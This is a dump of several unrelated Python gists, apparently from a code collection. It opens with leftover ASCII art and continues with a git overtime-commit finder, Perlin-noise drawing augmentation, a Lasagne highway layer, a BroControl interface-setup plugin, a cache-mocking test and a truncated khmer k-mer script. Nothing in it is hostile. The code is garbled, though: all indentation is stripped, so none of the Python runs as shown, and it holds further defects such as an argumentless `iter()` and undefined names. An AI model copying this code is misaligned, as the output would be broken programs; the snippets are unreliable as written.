yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnnnnnnnnnnnnnnnnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnnnqqllffffffllqqqqqqyynnnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnyyffZZppppppQQppllqqllllllllqqyynnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnllppQQQQQQppppQQppllqqllllllllllllqqnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnyyZZppQQppppppppppQQppllllllllllllllllllqqyynnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnyyZZQQppppppppppppppQQppllqqllllllllllllllllllyynnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnyyZZQQppppppppppppppppQQppllqqllllllllllllllllllllyynnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnZZQQppppppppppppppppppQQppllqqllllllllllllllllllllqqnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnffQQppppppppppppppppppppQQppllqqllllllllllllllllllllllqqnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnllppQQppppppppppppppppppppQQppllqqllllllllllllllllllllllqqyynnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnyyZZQQppppppppppppppppppppppQQppllqqllllllllllllllllllllllllqqnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnffQQppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllyyxxyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnqqppQQppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllllnnxxyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnZZQQppppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllllqqssnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyynnllppQQppppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllllllyyssnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyynnnnZZQQppppppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllllllqqxxxxnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyynnllppppppppppppppppppppppppppppppppQQppllqqllllllllllllllllllllllllllllllllyyssnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyynnnnZZQQppppppppppppppppppppppppppppppppppllqqllllllllllllllllllllllllllllllllqqxxxxnnnnyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyynnllppppppppppppppppppppppppppQQQQQQQQQQQQffffffllllllllllllllllllllllllllllllllyyssxxxxnnyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyynnZZQQppppppppppppppppppQQQQQQddddddddddddZZZZZZffffffffllllllllllllllllllllllllqqxxxxnnnnnnyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyynnllppQQppppppppppppQQQQQQddddddddddddddddddZZZZZZZZffffffffffffllllllllllllllllllllnnssxxnnnnnnyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyynnZZQQppppppppppppQQddddddddddddddddddddddddZZZZZZZZZZffffffffffffffllllllllllllllllqqssxxxxnnnnnnyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyynnllppQQppppppQQQQQQddddddddddddddddddddddddddZZZZZZZZZZZZffffffffffffffffllllllllllllllnnssxxnnnnnnnnyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyynnZZQQppppppQQppppddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZffffffffffffffllllllllllllyyssxxxxnnnnnnnnyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyynnqqppQQppppQQppqqZZddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZffffffffffffffllllllllllqqnnssxxxxnnnnnnnnyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyynnffQQppppQQppyyyyZZddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZffffffffffyyqqllllllllyyssxxxxnnnnnnnnnnyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyynnyyppQQppppQQqq??yyZZddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZZZZZffffllwwxxllllllllqqxxxxxxxxnnnnnnnnyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyynnllppppppQQZZcc??xxZZddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZqqccvvyyllllllllyyssxxxxnnnnnnnnnnyyyyyyyyyyyy
yyyyyyyyyyyyyynnnnZZQQppppQQqq????ccffddddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZZZZZZZffnnxxssnnllllllllqqssxxxxxxnnnnnnnnnnyyyyyyyyyy
yyyyyyyyyyyyyynnqqppQQppQQppss??wwxxllQQddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZZZZZZZllxxxxxxxxqqllllllllnnssxxxxnnnnnnnnnnnnyyyyyyyy
yyyyyyyyyyyyyynnffQQppppQQZZvvssqqqqqqppddddddddddddddddddddddddddZZZZZZZZZZZZZZZZZZZZZZZZZZZZnnssssccccyyllllllllyyssxxxxnnnnnnnnnnnnyyyyyyyy
yyyyyyyyyyyynnyyppQQppppQQffssyynnxxccffddddddddddddddddddQQppppZZqqqqllffZZZZZZZZZZZZZZZZZZllssxxxxcc??nnllllllllqqxxxxxxxxnnnnnnnnnnnnyyyyyy
yyyyyyyyyyyynnllppppppppQQllvvcc??????qqddddddddddddddddppffffffllxxssxxxxqqZZZZZZZZZZZZZZZZnnvvssxxjj??nnllllllllllyyssxxxxnnnnnnnnnnnnnnyyyy
yyyyyyyyyyyynnZZQQppppppQQqq??????cc??xxQQddddddddddddppffffffffllxxssssssssqqZZZZZZZZZZZZffww??vvvvcc??xxllllllllllqqssxxxxxxnnnnnnnnnnnnyyyy
yyyyyyyyyynnqqppQQppppppQQqq??vvcc??wwyyZZddddddddddQQffffffZZZZZZyynnnnxxssxxffZZZZZZZZZZyy??vvvv??vv??xxllllllllllqqnnssxxxxnnnnnnnnnnnnnnyy
yyyyyyyyyynnffQQppppppppQQqq??vv??ccyyqqqqppddddddddppffffppddddQQZZffZZllxxssyyZZZZZZZZlljj??vvvvvvvv??nnllllllllllllyyssxxxxxxnnnnnnnnnnnnyy
yyyyyyyyyynnZZQQppppppppQQll????wwnnyywwjjffppQQQQppffffZZQQppppZZqqyyqqffyyssxxllffffqqxxcc??vvvvvvvv??nnllllllllllllqqxxxxxxxxnnnnnnnnnnnnnn
yyyyyyyyyynnZZQQppppppppQQff????jjjj??vvxxllffffffffffffZZffllffllxxjjjjnnyyxxxxxxnnxxssjjvv??vv??vv????yyllllllllllllqqssxxxxxxnnnnnnnnnnnnnn
yyyyyyyyyynnllppppppppppQQZZjj??vv??ccssssxxffffffffffffffffffffffnnxxxxssssxxxxxxssxxxxww??vvvv??vv??ccqqllllllllllllyyssxxxxxxxxnnnnnnnnnnnn
yyyyyyyyyynnyyppQQppppppQQppnn??vvvvvvvv????qqffffffffffffffffffffnnssxxxxxxxxxxxxxxxxss????vvvv??vv??ssllllllllllllqqxxssxxxxxxxxnnnnnnnnnnnn
yyyyyyyyyyyynnffQQppppppppQQll??vvvv????vv??jjllffffffffffffffffffnnssxxxxxxxxxxxxxxxxcc??vv??vvvvvv??nnllllllllllllyyssxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyynnqqppQQppppppQQZZww??vvvvvvvvvv??nnffffffffffffffffffnnssxxxxxxxxxxxxxxjj??vvvvvv??vv??ccqqllllllllllqqnnssxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyyyynnZZQQppppppQQppnn??vvvv????vv????yyffffffffffffffffnnssxxxxxxxxxxxxjj????vv??vv??vv??ssqqllllllllllqqssxxxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyyyynnqqppQQppppppQQll??vvvvvvvv??vv????qqffffffffffffffnnssxxxxxxxxxxssvv??vv??vvvvvvvv??nnllllllllllllnnssxxxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyyyyyynnZZQQppppppQQZZ????vvvvvvvv??vv??vvyyffffffffffffnnssxxxxxxxxssvv??vv??vvvv??vv????yyllllllllllqqssxxxxxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyyyyyynnqqppQQppppQQppss??vv??vvvvvv??vv????nnffffffffllnnssxxxxxxjj????vv??vvvvvv??vv??wwqqllllllllllnnssxxxxxxxxxxxxxxxxnnnnnnnnnn
yyyyyyyyyyyyyyyyyynnffQQppppQQppnn??cc??vvvvvvvv??vv????ssqqffZZffnnxxxxssww????vv??vvvvvvvvvvvv??ssllllllllllyyssxxxxxxxxxxxxxxxxnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyynnyyppQQppppQQll??ccvvvvvvvvvvvv??vvvv????ssqqllxxjjww????vvvv??vvvvvvvv??vvvv??nnllllllllqqxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyynnllppQQppQQff????vvvvvvvvvvvvvv??vvvv??????wwcc??????vvvv??vvvvvvvvvv??vv????yyllllllllnnssxxxxxxxxxxxxxxxxnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyynnffQQppQQZZww??vv??vvvvvvvvvvvv????vvvv????????vvvvvvvvvvvvvvvvvvvv??vv??ccqqllllllyyssxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyynnnnZZQQQQppss??cc??vvvvvvvvvvvvvvvv????vvvvvvvvvv??vvvvvvvvvvvvvvvv??vv??wwqqllllqqxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyynnyyZZQQppnn??cc??vvvvvvvvvvvvvvvvvvvv????vvvvvvvvvvvvvvvvvvvvvvvvvvvv??jjqqllqqxxssxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyynnqqppQQyy??cc??vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv??ssllqqnnssxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyynnllppqq??cc??vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv??vvvv??xxllnnssxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnllqq??vvvv??vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv??vv????xxnnssxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnjj????vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv????wwssssxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnss????vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv??vvjjxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyxxcc????vvvvvv??vvvvvvvvvvvvvvvvvvvvvvvvvvvv????wwssxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyxxjjcc????vvvvvvvv????vvvv????vvvvvvvv????ccjjxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnssjjcc??????vvvvvvvvvvvvvvvv??????ccjjssxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxssjjcc????????????????????ccjjssxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxxxxxssjjccvv????vvccjjssxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxxxxxxxxxssssssssxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyynnnnnnxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
"""
```
#### File: hard-gists/4b79e30fad4ae8a50e2630fcfc4c8cfd/snippet.py
```python
import subprocess
import re
from dateutil import parser
class History(object):
def __init__(self, commits):
self._commits = ['%s' % n for n in commits if n.ot]
def __iter__(self):
return iter()
def __str__(self):
return '\n\n'.join(self._commits)
class Commit(object):
_ot = False
_quittingTime = 16
def __init__(self, raw):
self._pieces = [x.strip() for x in raw.split('\\n') if x != ''][:4]
if (len(self._pieces) >=4):
self._pieces = [re.sub(r'^([A-Z].*:\ )', '', x) for x in self._pieces]
dateObj = parser.parse(self._pieces[2])
self._pieces[2] = dateObj.strftime('%A %B %d %I:%M %p')
if (dateObj.hour >= self._quittingTime or dateObj.weekday() >= 5):
self._ot = True
def __str__(self):
return '\n'.join(self._pieces)
@property
def ot(self):
return self._ot
def runSubProc(args):
subp = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return str(subp.stdout.read())
def getHistory(user):
logs = runSubProc(["git", "log", '--author=%s' % user, "--no-merges"])
return History([Commit(x) for x in logs.split("commit")])
def main():
user = runSubProc(["git", "config", "user.email"]).strip("b'")[:-2]
logs = getHistory(user)
print(logs)
if __name__ == '__main__':
main()
```
#### File: hard-gists/4ba8ae5459ca4a287d42af549a611792/snippet.py
```python
import numpy as np
from noise import pnoise2, pnoise3
from scipy.ndimage.filters import gaussian_filter, gaussian_filter1d
def center_and_scale(drawing):
"""
Translate an entire drawing to the mean location of the points,
then scale the drawing to fit within +/-1.
"""
all_points = np.vstack(drawing)
meanxy = np.mean(all_points, axis=0)
minxy = np.min(all_points, axis=0) - meanxy
maxxy = np.max(all_points, axis=0) - meanxy
max_range = np.max(np.abs((minxy, maxxy)))
return [(stroke - meanxy) / max_range for stroke in drawing]
def get_noise_seed(seed=None):
if seed is None:
return np.random.rand(1) * 100000
else:
return seed
def noise_xy(points, scale=0.1, frequency=0.5, octaves=3, seed=None):
"""
Generate a number of x,y points using Perlin noise.
"""
seed = get_noise_seed(seed)
tn = np.linspace(seed, seed + frequency, points)
x = [pnoise2(0, float(t), octaves) * scale for t in tn]
y = [pnoise2(1, float(t), octaves) * scale for t in tn]
return x, y
def jitter_stroke(stroke, scale):
"""
Jitter the points in a stroke with Perlin noise.
"""
n = len(stroke)
x, y = noise_xy(n, scale=scale)
offsets = np.vstack([x, y])
return stroke + offsets.T
def jitter(drawing, scale=0.1):
"""
Jitter an entire drawing by jittering each stroke with Perlin noise.
"""
return [jitter_stroke(stroke, scale) for stroke in drawing]
def warp_stroke(stroke, scale=0.5, frequency=0.5, octaves=3, seed=None):
"""
Warp a stroke by applying a Perlin noise deformation field.
"""
seed = get_noise_seed(seed)
offsets = [[pnoise3(0 + seed, x, y, 3), pnoise3(1 + seed, x, y, 3)] for x, y in (stroke * frequency)]
return stroke + np.asarray(offsets) * scale
def warp(drawing, scale=0.5, frequency=0.5, octaves=3, seed=None):
"""
Warp a drawing by applying a Perlin noise deformation field.
"""
seed = get_noise_seed(seed)
return [warp_stroke(stroke, scale=scale, frequency=frequency, octaves=octaves, seed=seed) for stroke in drawing]
def smooth_position_stroke(stroke, sigma=1):
"""
Smooth a stroke with a Gaussian filter.
This smooths things in "sample space" rather than "real space".
"""
stroke[:,0] = gaussian_filter1d(stroke[:,0], sigma=sigma, mode='nearest')
stroke[:,1] = gaussian_filter1d(stroke[:,1], sigma=sigma, mode='nearest')
return stroke
def smooth_position(drawing, sigma=1):
"""
Smooth all the strokes in a drawing with a Gaussian filter.
This smooths things in "sample space" rather than "real space".
"""
sigma = np.abs(sigma * np.random.randn(1))
return [smooth_position_stroke(stroke, sigma=sigma) for stroke in drawing]
def smooth_velocity_stroke(stroke, sigma=1):
"""
Smooth a stroke by smoothing the derivative rather than the points directly.
"""
x = stroke[:,0]
y = stroke[:,1]
xd = gaussian_filter1d(np.diff(x), sigma=sigma, mode='nearest')
yd = gaussian_filter1d(np.diff(y), sigma=sigma, mode='nearest')
stroke[1:,0] = x[0] + np.cumsum(xd)
stroke[1:,1] = y[0] + np.cumsum(yd)
return stroke
def smooth_velocity(drawing, sigma=1):
"""
Smooth a drawing by smoothing the derivative rather than the points directly.
"""
sigma = np.abs(sigma * np.random.randn(1))
return [smooth_velocity_stroke(stroke, sigma=sigma) for stroke in drawing]
def jitter_scale(drawing, overall_sigma=0.1, aspect_sigma=0.05):
"""
Scale an entire drawing about 0,0 by a random gaussian.
"""
scale = (1 + np.random.randn(1) * overall_sigma) + np.random.randn(2) * aspect_sigma
return [stroke * scale for stroke in drawing]
def jitter_translate(drawing, sigma=0.10):
"""
Translate an entire drawing by a random gaussian.
"""
translate = np.random.randn(2) * sigma
return [stroke + translate for stroke in drawing]
def create_rotation_matrix(theta):
c, s = np.cos(theta), np.sin(theta)
return np.array([[c, -s], [s, c]])
def jitter_rotate(drawing, sigma=0.2):
"""
Rotate an entire drawing about 0,0 by a random gaussian.
"""
rotation = np.random.randn(1) * sigma
matrix = create_rotation_matrix(rotation)
return [np.dot(stroke, matrix).squeeze() for stroke in drawing]
def jitter_translate_stroke(drawing, sigma=0.02):
"""
Translate each stroke in a drawing by a random gaussian.
"""
return [stroke + np.random.randn(2) * sigma for stroke in drawing]
def jitter_scale_stroke(drawing, sigma=0.05):
"""
Scale each stroke in a drawing about the center of each stroke by a random gaussian.
"""
centers = [np.mean(stroke) for stroke in drawing]
return [((stroke - center) * (1 + np.random.randn(2) * sigma)) + center
for center, stroke in zip(centers, drawing)]
def jitter_rotate_stroke(drawing, sigma=0.2):
"""
Rotate each stroke in a drawing about the center of each stroke by a random gaussian.
"""
rotation = np.random.randn(1) * sigma
matrix = create_rotation_matrix(rotation)
centers = [np.mean(stroke) for stroke in drawing]
return [np.dot(stroke - center, matrix).squeeze() + center
for center, stroke in zip(centers, drawing)]
def shuffle_strokes(drawing, amount=0.25):
"""
Randomly swap the order of a percentage of the strokes in a drawing.
May swap less than the given percentage if it undoes a previous swap.
"""
n = len(drawing)
stroke_indices = np.arange(n)
shuffle_count = int(n * amount)
for i in range(shuffle_count):
i0 = np.random.randint(n)
i1 = np.random.randint(n)
temp = stroke_indices[i0]
stroke_indices[i0] = stroke_indices[i1]
stroke_indices[i1] = temp
return [drawing[i] for i in stroke_indices]
def reverse_strokes(drawing, amount=0.25):
"""
Randomly reverse the direction of a percentage of the strokes in a drawing.
"""
n = len(drawing)
indices = np.arange(n)
np.random.shuffle(indices)
flip_n = int(amount * n)
flip_indices = indices[:flip_n]
flips = [i in flip_indices for i in range(n)]
return [np.flipud(stroke) if flip else stroke for flip, stroke in zip(flips, drawing)]
```
#### File: hard-gists/4c223b8e2d72b0e35bde/snippet.py
```python
from lasagne.layers import Layer
class HighwayLayer(Layer):
def __init__(self, incoming, layer_class, gate_nonlinearity=None,
**kwargs):
super(HighwayLayer, self).__init__(incoming)
self.H_layer = layer_class(incoming, **kwargs)
if gate_nonlinearity:
kwargs['nonlinearity'] = gate_nonlinearity
else:
kwargs['nonlinearity'] = lasagne.nonlinearities.sigmoid
kwargs['b'] = lasagne.init.Constant(-2)
self.T_layer = layer_class(incoming, **kwargs)
def get_params(self):
return self.H_layer.get_params() + self.T_layer.get_params()
def get_bias_params(self):
return self.H_layer.get_bias_params() + self.T_layer.get_bias_params()
def get_output_shape_for(self, input_shape):
return input_shape
def get_output_for(self, input, **kwargs):
T = self.T_layer.get_output_for(input, **kwargs)
return input * (1 - T) + T * self.H_layer.get_output_for(input, **kwargs)
def build_model(input_dim, output_dim,
batch_size=BATCH_SIZE, num_hidden_units=NUM_HIDDEN_UNITS):
""" Example usage (replaces build_model in mnist.py) """
l_in = lasagne.layers.InputLayer(
shape=(batch_size, input_dim),
)
l_in = lasagne.layers.DenseLayer(
l_in,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
W=lasagne.init.HeNormal(),
)
for i in range(49):
l_in = HighwayLayer(
l_in,
lasagne.layers.DenseLayer,
num_units=num_hidden_units,
nonlinearity=lasagne.nonlinearities.rectify,
W=lasagne.init.HeNormal(),
)
l_out = lasagne.layers.DenseLayer(
l_in,
num_units=output_dim,
nonlinearity=lasagne.nonlinearities.softmax,
)
return l_out
```
#### File: hard-gists/4cfe3995013225d1d119/snippet.py
```python
import BroControl.plugin
class InterfaceSetupPlugin(BroControl.plugin.Plugin):
def __init__(self):
super(InterfaceSetupPlugin, self).__init__(apiversion=1)
def name(self):
return "InterfaceSetupPlugin"
def prefix(self):
return "interfacesetup"
def pluginVersion(self):
return 1
def init(self):
if self.getOption("enabled") == "0":
return False
return True
def options(self):
return [("mtu", "int", "9710", "Interface MTU"),
("enabled", "string", "0", "Set to enable plugin")]
def cmd_start_pre(self, nodes):
if not nodes:
return
mtu = self.getOption("mtu")
self.message("InterfaceSetupPlugin: mtu=%s" % (mtu))
host_nodes = {}
for n in nodes:
if n.interface:
host_nodes[(n.host, n.interface)] = n
cmds = []
for n in host_nodes.values():
cmd = "/sbin/ifconfig %s up mtu %s" % (n.interface, mtu)
cmds.append((n, cmd))
cmd = "/sbin/ethtool -K %s gro off lro off rx off tx off gso off" % (n.interface)
cmds.append((n, cmd))
self.executeParallel(cmds)
```
#### File: hard-gists/4e97eb41e2b9a80cd5de/snippet.py
```python
from myapp.mymodule import set_cache, get_cache
with patch('myapp.mymodule.cache') as mock_cache:
cache = {}
def get(key, default=None):
return cache.get(key, default)
def _set(key, value, timeout=60):
cache[key] = value
mock_cache.get = get
mock_cache.set = _set
set_cache()
self.assertEqual(cache['foo'], 'bar')
self.assertEqual(get_cache(), 'bar')
```
#### File: hard-gists/4ed43412878723491240814a0d5a6ed6/snippet.py
```python
import argparse
from khmer import khmer_args
import khmer
from khmer.kfile import check_input_files
from khmer.khmer_args import build_counting_args
from scipy.signal import find_peaks_cwt
import sys
import numpy as np
def peakdet(v, delta, x=None):
"""
Converted from MATLAB script at http://billauer.co.il/peakdet.html
Returns two arrays
function [maxtab, mintab]=peakdet(v, delta, x)
%PEAKDET Detect peaks in a vector
% [MAXTAB, MINTAB] = PEAKDET(V, DELTA) finds the local
% maxima and minima ("peaks") in the vector V.
% MAXTAB and MINTAB consists of two columns. Column 1
% contains indices in V, and column 2 the found values.
%
% With [MAXTAB, MINTAB] = PEAKDET(V, DELTA, X) the indices
% in MAXTAB and MINTAB are replaced with the corresponding
% X-values.
%
% A point is considered a maximum peak if it has the maximal
% value, and was preceded (to the left) by a value lower by
% DELTA.
% <NAME>, 3.4.05 (Explicitly not copyrighted).
% This function is released to the public domain; Any use is allowed.
"""
maxtab = []
mintab = []
if x is None:
x = np.arange(len(v))
v = np.asarray(v)
mn, mx = np.Inf, -np.Inf
mnpos, mxpos = np.NaN, np.NaN
lookformax = True
for i in np.arange(len(v)):
this = v[i]
if this > mx:
mx = this
mxpos = x[i]
if this < mn:
mn = this
mnpos = x[i]
if lookformax:
if this < mx - delta:
maxtab.append((mxpos, mx))
mn = this
mnpos = x[i]
lookformax = False
else:
if this > mn + delta:
mintab.append((mnpos, mn))
mx = this
mxpos = x[i]
lookformax = True
maxtab = [ int(i[0]) for i in maxtab]
return maxtab
def plot(x, plot_file, min_peaks=None, max_peaks=None):
"""Plot results of the detect_peaks function, see its help."""
try:
import matplotlib.pyplot as plt
except ImportError:
print('matplotlib is not available.')
else:
plt.style.use('ggplot')
_, ax = plt.subplots(1, 1, figsize=(8, 4))
ax.plot(x, 'black', lw=1)
if max_peaks:
ax.plot(max_peaks, x[max_peaks], '+', mfc=None, mec='g', mew=2, ms=8,
label='Max peaks')
if min_peaks:
ax.plot(min_peaks, x[min_peaks], '+', mfc=None, mec='r', mew=2, ms=8,
label='Min peaks')
ax.set_xlim(-.02 * x.size, x.size * 1.02 - 1)
ymin, ymax = x[np.isfinite(x)].min(), x[np.isfinite(x)].max()
yrange = ymax - ymin if ymax > ymin else 1
ax.set_ylim(ymin - 0.1 * yrange, ymax + 0.1 * yrange)
ax.set_xlabel('Abundance', fontsize=12)
ax.set_ylabel('Counts', fontsize=12)
plt.gcf().subplots_adjust(bottom=0.15)
ax.set_title("Min abundance finding.")
# plt.grid()
plt.savefig(plot_file)
def get_args():
parser = build_counting_args(
descr="Calculate the abundance distribution of k-mers from a "
"single sequence file.")
parser.add_argument('input_sequence_filename', help='The name of the input'
' FAST[AQ] sequence file.')
parser.add_argument('-z', '--no-zero', dest='output_zero', default=True,
action='store_false',
help='Do not output zero-count bins')
parser.add_argument('-b', '--no-bigcount', dest='bigcount', default=True,
action='store_false',
help='Do not count k-mers past 255')
parser.add_argument('-s', '--squash', dest='squash_output', default=False,
action='store_true',
help='Overwrite output file if it exists')
parser.add_argument('--savegraph', default='', metavar="filename",
help="Save the k-mer countgraph to the specified "
"filename.")
parser.add_argument('-f', '--force', default=False, action='store_true',
help='Overwrite output file if it exists')
parser.add_argument('-q', '--quiet', dest='quiet', default=False,
action='store_true')
parser.add_argument('--max-abundance', default=300, type=int, help="Max abundance to consider.")
parser.add_argument('--hist-plot', help="If set, the histogram of process will be saved there.")
return parser
def main():
args = get_args().parse_args()
check_input_files(args.input_sequence_filename, args.force)
print('making countgraph')
countgraph = khmer_args.create_countgraph(args, multiplier=1.1)
